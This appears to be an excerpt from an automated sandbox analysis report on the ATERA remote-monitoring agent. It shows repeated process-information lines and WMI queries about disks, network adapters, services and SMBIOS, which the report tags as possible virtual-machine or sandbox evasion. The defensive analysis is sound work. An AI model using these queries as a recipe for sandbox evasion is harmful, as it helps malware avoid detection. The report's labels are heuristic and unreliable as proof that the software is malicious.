Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID="\\\\.\\PHYSICALDRIVE0"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent="Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID="\\\\.\\PHYSICALDRIVE0"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent="Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID="\\\\.\\PHYSICALDRIVE0"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent="Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_DiskDrive.DeviceID="\\\\.\\PHYSICALDRIVE0"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Antecedent="Win32_DiskDrive.DeviceID=\"\\\\\\\\.\\\\PHYSICALDRIVE0\""

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PhysicalAdapter,Name,PNPDeviceID from Win32_NetworkAdapter
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapter

Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

WMI Queries: IWbemServices::ExecQuery - root\WMI : SELECT * FROM MSSMBios_RawSMBiosTables

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Name,DisplayName,Description,State from Win32_Service
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name='MSExchangeIS' OR DisplayName='MSExchangeIS'
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name='MSExchangeIS' OR DisplayName='MSExchangeIS'
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select DisplayName,Name,Started,State from Win32_Service where Name='MSExchangeIS' OR DisplayName='MSExchangeIS'

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size,FreeSpace,Name FROM Win32_LogicalDisk where DriveType=3
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #0"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #0\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #2"} where resultclass = Win32_LogicalDisk
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Antecedent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #2\""
